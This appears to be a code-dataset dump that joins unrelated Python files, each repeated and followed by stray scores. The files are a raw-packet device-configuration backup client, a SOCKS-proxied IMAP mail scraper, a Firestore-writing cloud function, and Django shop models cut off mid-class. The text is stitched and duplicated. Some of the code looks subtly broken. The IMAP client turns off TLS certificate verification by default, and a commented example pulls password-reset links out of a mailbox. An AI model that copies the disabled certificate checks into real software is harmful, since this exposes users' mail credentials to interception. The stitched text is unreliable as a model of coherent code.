PacketHeader = GeneratePacketHeader(self.target, self.dest_host)
PacketContent = self.PackContent()
confirmh = Confirm()
packet_send = snh + PacketHeader + PacketContent + confirmh
return packet_send
def ParsePacket(self, packet_receive):
ip_header = packet_receive[0:20]
ip_protocol = unpack('!B',ip_header[9])[0]
if ip_protocol != 254:
return None
snh = packet_receive[20:24]
sn = unpack('!L', snh)[0]
if sn != self.sn + 1:
return None
content_receive_head_pack = packet_receive[152:156]
content_receive_head = unpack('!BBH' , content_receive_head_pack)
FunCode = content_receive_head[0]
if FunCode != self.FunCode:
return None
Param = content_receive_head[1] #P=S
Length = content_receive_head[2] #L=Command_Code
content_receive_general_resp = unpack('!BB' , packet_receive[156:158])
Return_Code = content_receive_general_resp[0]
Status = content_receive_general_resp[1]
if Return_Code != self.Command_Code + 1:
return None
Flag = 0
Data_Len = 0
if Status == 0:
content_receive_data_pack = packet_receive[160:160+2051]
Flag = unpack('B',content_receive_data_pack[0])[0]
Data_Len = unpack('H',content_receive_data_pack[1:3])[0]
Data = unpack('!' + str(Data_Len) + 's', content_receive_data_pack[3 : 3 + Data_Len])[0]
file = open(self.filepath,'a')
file.write(Data)
file.close()
return [Status, Flag, Data_Len]
def SendAndReceive(self):
packet_send = self.PackPacket()
packet_receive = Transport.SocketTransport(packet_send, self.dest_host, self.sn)
if packet_receive == None: ## time out
return [-2, 0, 0]
status = self.ParsePacket(packet_receive)
if status == None:
return [-1, 0 ,0]
else:
return status | CTFd/privatesecurity.py | from flask_sqlalchemy import SQLAlchemy
from CTFd import models
from socket import inet_aton, inet_ntoa
from struct import unpack, pack
from struct import *
from time import ctime,sleep
from os import system
from CTFd.models import *
import socket
import struct
import ctypes
import datetime
import thread, time
import Transport
from generalfunction import GenerateSN,GeneratePacketHeader,Confirm
#1.2.40
class BackupConfigFile():
def __init__(self, id,dest_host,parameters,target ):
self.id = id
self.dest_host = dest_host
self.target = target
self.sn = GenerateSN()
# data of packet
self.FunCode = 254
self.Param1 = 254
self.Param2 = 6
self.Command_Code = 78
self.File_Type = parameters[0]#int
self.Offset = parameters[1] #string
self.flag = 128
self.filepath = parameters[2]
def PackContent(self):
buf = ctypes.create_string_buffer(16) ###change the size
struct.pack_into('!BBHBB', buf, 0, self.FunCode, self.Param1, self.Param2, self.Command_Code, self.File_Type)
struct.pack_into('L', buf, 6, self.Offset)
struct.pack_into('!B', buf, 10, self.flag)
return buf.raw
def PackPacket(self):
#sn = GenerateSN()
snh = struct.pack("!L", self.sn)
PacketHeader = GeneratePacketHeader(self.target, self.dest_host)
PacketContent = self.PackContent()
confirmh = Confirm()
packet_send = snh + PacketHeader + PacketContent + confirmh
return packet_send
def ParsePacket(self, packet_receive):
ip_header = packet_receive[0:20]
ip_protocol = unpack('!B',ip_header[9])[0]
if ip_protocol != 254:
return None
snh = packet_receive[20:24]
sn = unpack('!L', snh)[0]
if sn != self.sn + 1:
return None
content_receive_head_pack = packet_receive[152:156]
content_receive_head = unpack('!BBH' , content_receive_head_pack)
FunCode = content_receive_head[0]
if FunCode != self.FunCode:
return None
Param = content_receive_head[1] #P=S
Length = content_receive_head[2] #L=Command_Code
content_receive_general_resp = unpack('!BB' , packet_receive[156:158])
Return_Code = content_receive_general_resp[0]
Status = content_receive_general_resp[1]
if Return_Code != self.Command_Code + 1:
return None
Flag = 0
Data_Len = 0
if Status == 0:
content_receive_data_pack = packet_receive[160:160+2051]
Flag = unpack('B',content_receive_data_pack[0])[0]
Data_Len = unpack('H',content_receive_data_pack[1:3])[0]
Data = unpack('!' + str(Data_Len) + 's', content_receive_data_pack[3 : 3 + Data_Len])[0]
file = open(self.filepath,'a')
file.write(Data)
file.close()
return [Status, Flag, Data_Len]
def SendAndReceive(self):
packet_send = self.PackPacket()
packet_receive = Transport.SocketTransport(packet_send, self.dest_host, self.sn)
if packet_receive == None: ## time out
return [-2, 0, 0]
status = self.ParsePacket(packet_receive)
if status == None:
return [-1, 0 ,0]
else:
return status | 0.377885 | 0.076201 |
import time
import random
import ssl
import imaplib
from email import message_from_bytes, message_from_string
from email.header import decode_header
from email.message import Message
from email.utils import parseaddr, parsedate_to_datetime
from typing import Any, List, Optional, Union, Dict
import arrow
import regex as re
from regex import Pattern
import socks
from pyatom.base.debug import Debugger
from pyatom.base.proxy import Proxy
from pyatom.config import ConfigManager
from pyatom.config import DIR_DEBUG
__all__ = ("PostfixImap",)
class SocksIMAP4(imaplib.IMAP4):
"""
IMAP Service through socks proxy
Note: PySocks(socks) lib required.
"""
PROXY_TYPES = {
"socks4": socks.PROXY_TYPE_SOCKS4,
"socks5": socks.PROXY_TYPE_SOCKS5,
"http": socks.PROXY_TYPE_HTTP,
}
def __init__(
self,
host: str,
port: int = imaplib.IMAP4_PORT, # type: ignore
proxy_addr: Optional[str] = None,
proxy_port: Optional[int] = None,
proxy_username: Optional[str] = None,
proxy_password: Optional[str] = None,
proxy_type: Optional[int] = None,
proxy_rdns: bool = True,
) -> None:
self.host = host
self.port = port
self.proxy_addr = proxy_addr
self.proxy_port = proxy_port
self.proxy_username = proxy_username
self.proxy_password = <PASSWORD>
self.proxy_type = proxy_type
self.proxy_rdns = proxy_rdns
imaplib.IMAP4.__init__(self, host, port)
def _create_socket(self, timeout: Optional[int] = None) -> Any:
"""create socket"""
return socks.create_connection(
(self.host, self.port),
timeout=timeout,
proxy_type=self.proxy_type,
proxy_addr=self.proxy_addr,
proxy_port=self.proxy_port,
proxy_rdns=self.proxy_rdns,
proxy_username=self.proxy_username,
proxy_password=self.proxy_password,
)
class SocksIMAP4SSL(SocksIMAP4):
# pylint: disable=too-many-arguments
"""Socks imaplib ssl version"""
def __init__(
self,
host: str = "",
port: int = imaplib.IMAP4_SSL_PORT, # type: ignore
keyfile: Any = None,
certfile: Any = None,
ssl_context: Any = None,
proxy_addr: Optional[str] = None,
proxy_port: Optional[int] = None,
proxy_username: Optional[str] = None,
proxy_password: Optional[str] = None,
proxy_type: Optional[int] = None,
proxy_rdns: bool = True,
) -> None:
if ssl_context is not None:
if keyfile is not None:
msg = "arguments are mutually exclusive: ssl_context, keyfile"
raise ValueError(msg)
if certfile is not None:
msg = "arguments are mutually exclusive: ssl_context, certfile"
raise ValueError(msg)
self.keyfile = keyfile
self.certfile = certfile
if ssl_context is None:
ssl_context = ssl._create_unverified_context(
certfile=certfile, keyfile=keyfile
) # type: ignore
self.ssl_context = ssl_context
SocksIMAP4.__init__(
self,
host=host,
port=port,
proxy_addr=proxy_addr,
proxy_port=proxy_port,
proxy_username=proxy_username,
proxy_password=proxy_password,
proxy_type=proxy_type,
proxy_rdns=proxy_rdns,
)
def _create_socket(self, timeout: Optional[int] = None) -> Any:
sock = SocksIMAP4._create_socket(self, timeout=timeout)
server_host = self.host if ssl.HAS_SNI else None
return self.ssl_context.wrap_socket(sock, server_hostname=server_host)
def open(
self,
host: str = "",
port: int = imaplib.IMAP4_PORT, # type: ignore
timeout: Optional[float] = None,
) -> Any:
SocksIMAP4.open(self, host, port, timeout)
class ImapClient:
"""Imap Client"""
__slots__ = (
"host",
"port",
"usr",
"pwd",
"ssl",
"demo",
"proxy",
"debugger",
"folders",
"conn",
"encoding",
)
def __init__(
self,
host: str,
port: int,
usr: str,
pwd: str,
ssl_enable: bool = True,
demo: bool = True,
proxy: Optional[Proxy] = None,
debugger: Optional[Debugger] = None,
encoding: str = "unicode_escape",
) -> None:
self.host = host
self.port = port
self.usr = usr
self.pwd = <PASSWORD>
self.ssl = ssl_enable
self.demo = demo
self.proxy = proxy
self.debugger = debugger
self.encoding = encoding
self.folders = ["Inbox"]
self.conn: Any = None
def log(self, message: Any) -> None:
"""logging message if demo is True"""
if self.demo is True:
now = arrow.now().format("YYYY-MM-DD HH:mm:ss")
print(f"{now} - {message}")
def login(self) -> bool:
"""login using imaplib custom"""
if self.proxy:
if self.ssl:
self.conn = SocksIMAP4SSL(
host=self.host,
port=self.port,
proxy_addr=self.proxy.addr,
proxy_port=self.proxy.port,
proxy_username=self.proxy.usr,
proxy_password=<PASSWORD>,
proxy_type=self.proxy.type,
proxy_rdns=self.proxy.rdns,
)
else:
self.conn = SocksIMAP4(
host=self.host,
port=self.port,
proxy_addr=self.proxy.addr,
proxy_port=self.proxy.port,
proxy_username=self.proxy.usr,
proxy_password=<PASSWORD>,
proxy_type=self.proxy.type,
proxy_rdns=self.proxy.rdns,
)
else:
if self.ssl:
self.conn = imaplib.IMAP4_SSL(self.host, self.port)
else:
self.conn = imaplib.IMAP4(self.host, self.port)
if self.demo is True:
self.conn.debug = 4
return bool(self.conn.login(self.usr, self.pwd))
def logout(self) -> bool:
"""logout for imaplib"""
if self.conn and self.conn.close():
return bool(self.conn.lougout())
return False
@staticmethod
def is_bytes(obj: Any) -> bool:
"""check is bytes or not"""
try:
obj.decode()
return True
except AttributeError:
return False
def be_str(self, obj: Union[str, bytes]) -> str:
"""ensure bytes to be string"""
if isinstance(obj, bytes):
return obj.decode(encoding=self.encoding, errors="ignore")
return obj
@staticmethod
def guess_charset(msg: Message) -> str:
"""guess charset for email message"""
charset = ""
guess = msg.get_charsets()
if guess is None:
content_type = msg.get("Content-Type") or ""
content_type = content_type.lower().replace('"', "")
pattern = re.compile(r"(?<=charset=)[\w\-]+")
result = pattern.search(content_type)
if result:
charset = result.group()
return charset
def get_uids(self, folder: str, query: str) -> List[str]:
"""search to get list of email uids"""
if self.conn:
flag, data = self.conn.select(folder)
if flag == "OK":
time.sleep(random.uniform(0.05, 0.10))
flag, data = self.conn.search(None, query)
if flag == "OK":
return [x.decode() for x in data[0].split()]
return []
def get_msg(self, uid: str, timestamp: int = 0) -> dict:
"""read email message by uid, may filter by timestamp"""
result: Dict[str, str] = {}
if not self.conn:
return result
_, data = self.conn.fetch(uid, "(RFC822)")
if not _ == "OK" or data is None or data[0] is None:
return result
item = data[0][1]
if self.is_bytes(item):
msg = message_from_bytes(bytes(item))
else:
msg = message_from_string(str(item))
e_date = msg["Date"]
time_stamp = parsedate_to_datetime(e_date).timestamp()
if time_stamp and timestamp and time_stamp < timestamp:
return result
_, e_from = parseaddr(msg["From"])
_, e_to = parseaddr(msg["To"])
e_sub = decode_header(msg["Subject"])[0][0].decode(
encoding=self.encoding, errors="ignore"
)
self.log(f"Raw date: {e_date}")
self.log(f"Subject: {e_sub}")
self.log(f"From: {e_from}")
self.log(f"To: {e_to}")
while msg.is_multipart():
msg = msg.get_payload(0)
e_body = msg.get_payload(decode=True)
charset = self.guess_charset(msg)
if charset:
e_body = e_body.decode(charset)
else:
e_body = e_body.decode()
e_date = self.be_str(msg["Date"])
e_sub = self.be_str(e_sub)
e_from = self.be_str(e_from)
e_to = self.be_str(e_to)
return {
"uid": uid,
"date": e_date,
"subject": e_sub,
"from": e_from,
"to": e_to,
"body": e_body,
}
def lookup(
self, query: str, pattern: Pattern, timestamp: int = 0, debug: bool = False
) -> list:
"""lookup through mailbox and filter email content by regex"""
result = []
for folder in self.folders:
uids = self.get_uids(folder, query)
for index, uid in enumerate(reversed(uids)):
self.log(f"<index={index}> - <uid={uid}>")
msg_data = self.get_msg(uid, timestamp)
if not msg_data:
continue
if debug:
print(f"index={index} - uid={uid}")
print(msg_data)
if self.debugger:
self.debugger.id_add()
self.debugger.save(msg_data)
if not pattern:
continue
res = pattern.findall(msg_data["body"])
result.extend(res)
return list(set(result))
class PostfixImap(ImapClient):
"""Postfix Email Imap Client"""
def __init__(
self,
host: str,
port: int,
usr: str,
pwd: str,
proxy: Optional[Proxy] = None,
ssl_enable: bool = True,
demo: bool = True,
encoding: str = "unicode_escape",
) -> None:
super().__init__(
host=host,
port=port,
usr=usr,
pwd=<PASSWORD>,
proxy=proxy,
ssl_enable=ssl_enable,
demo=demo,
encoding=encoding,
)
@staticmethod
def _date_str(time_stamp: int = 0, days: int = 1) -> str:
"""generate date str"""
fmt = "D-MMM-YYYY"
if time_stamp:
return arrow.get(time_stamp).format(fmt)
return arrow.now().shift(days=-days).format(fmt)
def search(
self,
from_email: str,
to_email: str,
subject: str,
pattern: re.Pattern,
time_stamp: int = 0,
retry: int = 6,
debug: bool = False,
) -> List[str]:
"""search email by various filters"""
date_str = self._date_str(time_stamp=time_stamp)
query = f'(SINCE {date_str} FROM "{from_email}" TO "{to_email}" SUBJECT "{subject}")'
query = f'SUBJECT "{subject}"'
for _ in range(retry):
if self.login():
results = self.lookup(query, pattern, time_stamp, debug)
if results:
return results
if debug:
break
time.sleep(60)
return []
def example(self) -> List[str]:
"""
show case for search substack password reset url
Note: ts <= 365 days
"""
# from_email = "<EMAIL>"
# to_email = "<EMAIL>"
# subject = "Set your password for Substack"
# pattern = r'(http:\/\/email\.mg1\.substack\.com\/c\/[\S]+?)"'
from_email = "<EMAIL>"
to_email = "<EMAIL>"
subject = "just another testing"
pattern = r"someone else"
pattern = re.compile(pattern, re.I)
time_stamp = int(arrow.now().shift(days=-365).timestamp())
return self.search(
from_email,
to_email,
subject,
pattern,
time_stamp=time_stamp,
retry=6,
debug=True,
)
class TestImap:
"""TestCase for Imap Client."""
file_config = DIR_DEBUG.parent / "protect" / "config.json"
config = ConfigManager().load(file_config)
def to_client(self) -> PostfixImap:
"""Get PostfixImap Client."""
return PostfixImap(
host=self.config.postfix_domain,
port=self.config.postfix_port_imap,
usr=self.config.postfix_usr,
pwd=self.config.postfix_pwd,
proxy=Proxy.load(url=self.config.proxy_url),
)
def test_postfiximap(self) -> None:
"""test PostfixImap"""
client = self.to_client()
result = client.example()
print(result)
assert result
if __name__ == "__main__":
TestImap() | pyatom/client/imap.py |
import time
import random
import ssl
import imaplib
from email import message_from_bytes, message_from_string
from email.header import decode_header
from email.message import Message
from email.utils import parseaddr, parsedate_to_datetime
from typing import Any, List, Optional, Union, Dict
import arrow
import regex as re
from regex import Pattern
import socks
from pyatom.base.debug import Debugger
from pyatom.base.proxy import Proxy
from pyatom.config import ConfigManager
from pyatom.config import DIR_DEBUG
__all__ = ("PostfixImap",)
class SocksIMAP4(imaplib.IMAP4):
"""
IMAP Service through socks proxy
Note: PySocks(socks) lib required.
"""
PROXY_TYPES = {
"socks4": socks.PROXY_TYPE_SOCKS4,
"socks5": socks.PROXY_TYPE_SOCKS5,
"http": socks.PROXY_TYPE_HTTP,
}
def __init__(
self,
host: str,
port: int = imaplib.IMAP4_PORT, # type: ignore
proxy_addr: Optional[str] = None,
proxy_port: Optional[int] = None,
proxy_username: Optional[str] = None,
proxy_password: Optional[str] = None,
proxy_type: Optional[int] = None,
proxy_rdns: bool = True,
) -> None:
self.host = host
self.port = port
self.proxy_addr = proxy_addr
self.proxy_port = proxy_port
self.proxy_username = proxy_username
self.proxy_password = <PASSWORD>
self.proxy_type = proxy_type
self.proxy_rdns = proxy_rdns
imaplib.IMAP4.__init__(self, host, port)
def _create_socket(self, timeout: Optional[int] = None) -> Any:
"""create socket"""
return socks.create_connection(
(self.host, self.port),
timeout=timeout,
proxy_type=self.proxy_type,
proxy_addr=self.proxy_addr,
proxy_port=self.proxy_port,
proxy_rdns=self.proxy_rdns,
proxy_username=self.proxy_username,
proxy_password=self.proxy_password,
)
class SocksIMAP4SSL(SocksIMAP4):
# pylint: disable=too-many-arguments
"""Socks imaplib ssl version"""
def __init__(
self,
host: str = "",
port: int = imaplib.IMAP4_SSL_PORT, # type: ignore
keyfile: Any = None,
certfile: Any = None,
ssl_context: Any = None,
proxy_addr: Optional[str] = None,
proxy_port: Optional[int] = None,
proxy_username: Optional[str] = None,
proxy_password: Optional[str] = None,
proxy_type: Optional[int] = None,
proxy_rdns: bool = True,
) -> None:
if ssl_context is not None:
if keyfile is not None:
msg = "arguments are mutually exclusive: ssl_context, keyfile"
raise ValueError(msg)
if certfile is not None:
msg = "arguments are mutually exclusive: ssl_context, certfile"
raise ValueError(msg)
self.keyfile = keyfile
self.certfile = certfile
if ssl_context is None:
ssl_context = ssl._create_unverified_context(
certfile=certfile, keyfile=keyfile
) # type: ignore
self.ssl_context = ssl_context
SocksIMAP4.__init__(
self,
host=host,
port=port,
proxy_addr=proxy_addr,
proxy_port=proxy_port,
proxy_username=proxy_username,
proxy_password=proxy_password,
proxy_type=proxy_type,
proxy_rdns=proxy_rdns,
)
def _create_socket(self, timeout: Optional[int] = None) -> Any:
sock = SocksIMAP4._create_socket(self, timeout=timeout)
server_host = self.host if ssl.HAS_SNI else None
return self.ssl_context.wrap_socket(sock, server_hostname=server_host)
def open(
self,
host: str = "",
port: int = imaplib.IMAP4_PORT, # type: ignore
timeout: Optional[float] = None,
) -> Any:
SocksIMAP4.open(self, host, port, timeout)
class ImapClient:
"""Imap Client"""
__slots__ = (
"host",
"port",
"usr",
"pwd",
"ssl",
"demo",
"proxy",
"debugger",
"folders",
"conn",
"encoding",
)
def __init__(
self,
host: str,
port: int,
usr: str,
pwd: str,
ssl_enable: bool = True,
demo: bool = True,
proxy: Optional[Proxy] = None,
debugger: Optional[Debugger] = None,
encoding: str = "unicode_escape",
) -> None:
self.host = host
self.port = port
self.usr = usr
self.pwd = <PASSWORD>
self.ssl = ssl_enable
self.demo = demo
self.proxy = proxy
self.debugger = debugger
self.encoding = encoding
self.folders = ["Inbox"]
self.conn: Any = None
def log(self, message: Any) -> None:
"""logging message if demo is True"""
if self.demo is True:
now = arrow.now().format("YYYY-MM-DD HH:mm:ss")
print(f"{now} - {message}")
def login(self) -> bool:
"""login using imaplib custom"""
if self.proxy:
if self.ssl:
self.conn = SocksIMAP4SSL(
host=self.host,
port=self.port,
proxy_addr=self.proxy.addr,
proxy_port=self.proxy.port,
proxy_username=self.proxy.usr,
proxy_password=<PASSWORD>,
proxy_type=self.proxy.type,
proxy_rdns=self.proxy.rdns,
)
else:
self.conn = SocksIMAP4(
host=self.host,
port=self.port,
proxy_addr=self.proxy.addr,
proxy_port=self.proxy.port,
proxy_username=self.proxy.usr,
proxy_password=<PASSWORD>,
proxy_type=self.proxy.type,
proxy_rdns=self.proxy.rdns,
)
else:
if self.ssl:
self.conn = imaplib.IMAP4_SSL(self.host, self.port)
else:
self.conn = imaplib.IMAP4(self.host, self.port)
if self.demo is True:
self.conn.debug = 4
return bool(self.conn.login(self.usr, self.pwd))
def logout(self) -> bool:
"""logout for imaplib"""
if self.conn and self.conn.close():
return bool(self.conn.lougout())
return False
@staticmethod
def is_bytes(obj: Any) -> bool:
"""check is bytes or not"""
try:
obj.decode()
return True
except AttributeError:
return False
def be_str(self, obj: Union[str, bytes]) -> str:
"""ensure bytes to be string"""
if isinstance(obj, bytes):
return obj.decode(encoding=self.encoding, errors="ignore")
return obj
@staticmethod
def guess_charset(msg: Message) -> str:
"""guess charset for email message"""
charset = ""
guess = msg.get_charsets()
if guess is None:
content_type = msg.get("Content-Type") or ""
content_type = content_type.lower().replace('"', "")
pattern = re.compile(r"(?<=charset=)[\w\-]+")
result = pattern.search(content_type)
if result:
charset = result.group()
return charset
def get_uids(self, folder: str, query: str) -> List[str]:
"""search to get list of email uids"""
if self.conn:
flag, data = self.conn.select(folder)
if flag == "OK":
time.sleep(random.uniform(0.05, 0.10))
flag, data = self.conn.search(None, query)
if flag == "OK":
return [x.decode() for x in data[0].split()]
return []
def get_msg(self, uid: str, timestamp: int = 0) -> dict:
"""read email message by uid, may filter by timestamp"""
result: Dict[str, str] = {}
if not self.conn:
return result
_, data = self.conn.fetch(uid, "(RFC822)")
if not _ == "OK" or data is None or data[0] is None:
return result
item = data[0][1]
if self.is_bytes(item):
msg = message_from_bytes(bytes(item))
else:
msg = message_from_string(str(item))
e_date = msg["Date"]
time_stamp = parsedate_to_datetime(e_date).timestamp()
if time_stamp and timestamp and time_stamp < timestamp:
return result
_, e_from = parseaddr(msg["From"])
_, e_to = parseaddr(msg["To"])
e_sub = decode_header(msg["Subject"])[0][0].decode(
encoding=self.encoding, errors="ignore"
)
self.log(f"Raw date: {e_date}")
self.log(f"Subject: {e_sub}")
self.log(f"From: {e_from}")
self.log(f"To: {e_to}")
while msg.is_multipart():
msg = msg.get_payload(0)
e_body = msg.get_payload(decode=True)
charset = self.guess_charset(msg)
if charset:
e_body = e_body.decode(charset)
else:
e_body = e_body.decode()
e_date = self.be_str(msg["Date"])
e_sub = self.be_str(e_sub)
e_from = self.be_str(e_from)
e_to = self.be_str(e_to)
return {
"uid": uid,
"date": e_date,
"subject": e_sub,
"from": e_from,
"to": e_to,
"body": e_body,
}
def lookup(
self, query: str, pattern: Pattern, timestamp: int = 0, debug: bool = False
) -> list:
"""lookup through mailbox and filter email content by regex"""
result = []
for folder in self.folders:
uids = self.get_uids(folder, query)
for index, uid in enumerate(reversed(uids)):
self.log(f"<index={index}> - <uid={uid}>")
msg_data = self.get_msg(uid, timestamp)
if not msg_data:
continue
if debug:
print(f"index={index} - uid={uid}")
print(msg_data)
if self.debugger:
self.debugger.id_add()
self.debugger.save(msg_data)
if not pattern:
continue
res = pattern.findall(msg_data["body"])
result.extend(res)
return list(set(result))
class PostfixImap(ImapClient):
"""Postfix Email Imap Client"""
def __init__(
self,
host: str,
port: int,
usr: str,
pwd: str,
proxy: Optional[Proxy] = None,
ssl_enable: bool = True,
demo: bool = True,
encoding: str = "unicode_escape",
) -> None:
super().__init__(
host=host,
port=port,
usr=usr,
pwd=<PASSWORD>,
proxy=proxy,
ssl_enable=ssl_enable,
demo=demo,
encoding=encoding,
)
@staticmethod
def _date_str(time_stamp: int = 0, days: int = 1) -> str:
"""generate date str"""
fmt = "D-MMM-YYYY"
if time_stamp:
return arrow.get(time_stamp).format(fmt)
return arrow.now().shift(days=-days).format(fmt)
def search(
self,
from_email: str,
to_email: str,
subject: str,
pattern: re.Pattern,
time_stamp: int = 0,
retry: int = 6,
debug: bool = False,
) -> List[str]:
"""search email by various filters"""
date_str = self._date_str(time_stamp=time_stamp)
query = f'(SINCE {date_str} FROM "{from_email}" TO "{to_email}" SUBJECT "{subject}")'
query = f'SUBJECT "{subject}"'
for _ in range(retry):
if self.login():
results = self.lookup(query, pattern, time_stamp, debug)
if results:
return results
if debug:
break
time.sleep(60)
return []
def example(self) -> List[str]:
"""
show case for search substack password reset url
Note: ts <= 365 days
"""
# from_email = "<EMAIL>"
# to_email = "<EMAIL>"
# subject = "Set your password for Substack"
# pattern = r'(http:\/\/email\.mg1\.substack\.com\/c\/[\S]+?)"'
from_email = "<EMAIL>"
to_email = "<EMAIL>"
subject = "just another testing"
pattern = r"someone else"
pattern = re.compile(pattern, re.I)
time_stamp = int(arrow.now().shift(days=-365).timestamp())
return self.search(
from_email,
to_email,
subject,
pattern,
time_stamp=time_stamp,
retry=6,
debug=True,
)
class TestImap:
"""TestCase for Imap Client."""
file_config = DIR_DEBUG.parent / "protect" / "config.json"
config = ConfigManager().load(file_config)
def to_client(self) -> PostfixImap:
"""Get PostfixImap Client."""
return PostfixImap(
host=self.config.postfix_domain,
port=self.config.postfix_port_imap,
usr=self.config.postfix_usr,
pwd=self.config.postfix_pwd,
proxy=Proxy.load(url=self.config.proxy_url),
)
def test_postfiximap(self) -> None:
"""test PostfixImap"""
client = self.to_client()
result = client.example()
print(result)
assert result
if __name__ == "__main__":
TestImap() | 0.67822 | 0.066812 |
import base64
import datetime
import json
import logging
import os
from typing import Any, Dict, Optional
from google.cloud import firestore
from google.cloud.functions_v1.context import Context
import google.cloud.logging
import pytz
# Set-up logging
client = google.cloud.logging.Client()
handler = google.cloud.logging.handlers.CloudLoggingHandler(client)
logger = logging.getLogger('cloudLogger')
logger.setLevel(logging.DEBUG) # defaults to WARN
logger.addHandler(handler)
COLLECTION_NAME = '{}_{}_{}'.format(
os.getenv('DEPLOYMENT_NAME', ''), os.getenv('SOLUTION_PREFIX', ''),
os.getenv('FST_LONG_RUNNING_TASKS_COLLECTION', ''))
DEFAULT_GCP_PROJECT = os.getenv('DEFAULT_GCP_PROJECT', '')
DISCARD_TASKS_OLDER_THAN_HOURS = int(
os.getenv('DISCARD_TASKS_OLDER_THAN_HOURS', '3'))
def _insert_into_firestore(project, collection, msg):
"""Writes a message into Firestore.
Args:
project: String representing the GCP project to use for the firestore DB
collection: String representing the firestore collection to use
msg: JSON object to write as Firestore document
"""
db = firestore.Client(project)
_ = db.collection(collection).add(msg)
def main(event: Dict[str, Any],
context=Optional[Context]):
"""Triggers writing a message into Firestore.
Args:
event (dict): The dictionary with data specific to this type of event. The
`data` field contains the PubsubMessage message. The `attributes` field
will contain custom attributes if there are any.
context (google.cloud.functions.Context): The Cloud Functions event
metadata. The `event_id` field contains the Pub/Sub message ID. The
`timestamp` field contains the publish time.
"""
del context # unused
pubsub_message = base64.b64decode(event['data']).decode('utf-8')
msg = json.loads(pubsub_message)
now = datetime.datetime.now(pytz.utc)
msg['inserted_timestamp'] = now
if msg['operation_name'] == 'Delayed Forwarding':
delta = datetime.timedelta(seconds=int(msg['delay_in_seconds']))
else:
delta = datetime.timedelta(hours=DISCARD_TASKS_OLDER_THAN_HOURS)
msg['expiration_timestamp'] = now + delta
msg['updated_timestamp'] = now
logger.debug('Inserting long runnning task into Firestore. msg: %s', msg)
_insert_into_firestore(DEFAULT_GCP_PROJECT, COLLECTION_NAME, msg)
if __name__ == '__main__':
msg_data = {
'payload': {
'runTime': '2020-06-20T02:00:00Z'
},
'operation_name': 'Delayed Forwarding',
'delay_in_seconds': 120,
'error_topic': '',
'success_topic': 'test.pltv.periodic_extract_ready',
'source_topic': 'test.pltv.periodic_extract_ready'
}
main(
event={
'data': base64.b64encode(bytes(json.dumps(msg_data).encode('utf-8')))
},
context=None) | cfs/long_running_task_writer/main.py | import base64
import datetime
import json
import logging
import os
from typing import Any, Dict, Optional
from google.cloud import firestore
from google.cloud.functions_v1.context import Context
import google.cloud.logging
import pytz
# Set-up logging
client = google.cloud.logging.Client()
handler = google.cloud.logging.handlers.CloudLoggingHandler(client)
logger = logging.getLogger('cloudLogger')
logger.setLevel(logging.DEBUG) # defaults to WARN
logger.addHandler(handler)
COLLECTION_NAME = '{}_{}_{}'.format(
os.getenv('DEPLOYMENT_NAME', ''), os.getenv('SOLUTION_PREFIX', ''),
os.getenv('FST_LONG_RUNNING_TASKS_COLLECTION', ''))
DEFAULT_GCP_PROJECT = os.getenv('DEFAULT_GCP_PROJECT', '')
DISCARD_TASKS_OLDER_THAN_HOURS = int(
os.getenv('DISCARD_TASKS_OLDER_THAN_HOURS', '3'))
def _insert_into_firestore(project, collection, msg):
"""Writes a message into Firestore.
Args:
project: String representing the GCP project to use for the firestore DB
collection: String representing the firestore collection to use
msg: JSON object to write as Firestore document
"""
db = firestore.Client(project)
_ = db.collection(collection).add(msg)
def main(event: Dict[str, Any],
context=Optional[Context]):
"""Triggers writing a message into Firestore.
Args:
event (dict): The dictionary with data specific to this type of event. The
`data` field contains the PubsubMessage message. The `attributes` field
will contain custom attributes if there are any.
context (google.cloud.functions.Context): The Cloud Functions event
metadata. The `event_id` field contains the Pub/Sub message ID. The
`timestamp` field contains the publish time.
"""
del context # unused
pubsub_message = base64.b64decode(event['data']).decode('utf-8')
msg = json.loads(pubsub_message)
now = datetime.datetime.now(pytz.utc)
msg['inserted_timestamp'] = now
if msg['operation_name'] == 'Delayed Forwarding':
delta = datetime.timedelta(seconds=int(msg['delay_in_seconds']))
else:
delta = datetime.timedelta(hours=DISCARD_TASKS_OLDER_THAN_HOURS)
msg['expiration_timestamp'] = now + delta
msg['updated_timestamp'] = now
logger.debug('Inserting long runnning task into Firestore. msg: %s', msg)
_insert_into_firestore(DEFAULT_GCP_PROJECT, COLLECTION_NAME, msg)
if __name__ == '__main__':
msg_data = {
'payload': {
'runTime': '2020-06-20T02:00:00Z'
},
'operation_name': 'Delayed Forwarding',
'delay_in_seconds': 120,
'error_topic': '',
'success_topic': 'test.pltv.periodic_extract_ready',
'source_topic': 'test.pltv.periodic_extract_ready'
}
main(
event={
'data': base64.b64encode(bytes(json.dumps(msg_data).encode('utf-8')))
},
context=None) | 0.562657 | 0.07221 |
from django.db import models
from django.contrib.auth.models import User
from django import forms
class Customer(models.Model):
customer = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
fname = models.CharField(max_length=100, default="Jhon")
lname = models.CharField(max_length=100, default="Doe")
email = models.EmailField(max_length=100, default="<EMAIL>")
def __str__(self):
return self.customer.username
class Product(models.Model):
tag_choices = (
('new', 'New'),
('hot', 'hot'),
('exclusive', 'Exclusive')
)
CHOICES = (
('crystal', 'Crystal'),
('statue', 'Stone Sculpture'),
('pebble', 'Pebble')
)
name = models.CharField(max_length=60)
category = models.CharField(max_length=25, choices=CHOICES, default='Crystal')
price = models.FloatField()
description = models.TextField(null=True, blank=True )
product_image = models.ImageField(default='default_product.jpg', upload_to='products')
discounted_price = models.FloatField(default=0.0)
tag = models.CharField(max_length=10, choices=tag_choices, null=True, blank=True)
available = models.BooleanField(default=True, null=True, blank=True)
digital = models.BooleanField(default=False, null=True, blank=False)
def __str__(self):
return self.name
class Order(models.Model):
SHIPPING_CHOICES = (
('standard', 'Standard Shiping'),
('express', 'Express Delivery'),
('nextDay', 'Next Business day')
)
customer = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True, blank=True)
shipping_type = forms.ChoiceField(choices=SHIPPING_CHOICES, widget=forms.RadioSelect())
date_ordered = models.DateTimeField(auto_now_add=True)
complete = models.BooleanField(default=False)
transaction_id = models.CharField(max_length=100, null=True)
# Code block for shipping logic if there are digital items that doesn't need shipping the forms disappears.
@property
def shipping(self):
shipping = False
orderitems = self.orderitem_set.all()
for i in orderitems:
if i.product.digital == False:
shipping = True
return shipping
@property
def get_cart_total(self):
orderitems = self.orderitem_set.all()
total = sum([item.get_total for item in orderitems])
return total
@property
def get_cart_items(self):
orderitems = self.orderitem_set.all()
total = sum([item.quantity for item in orderitems])
return total
def __str__(self):
return str(self.id)
class OrderItem(models.Model):
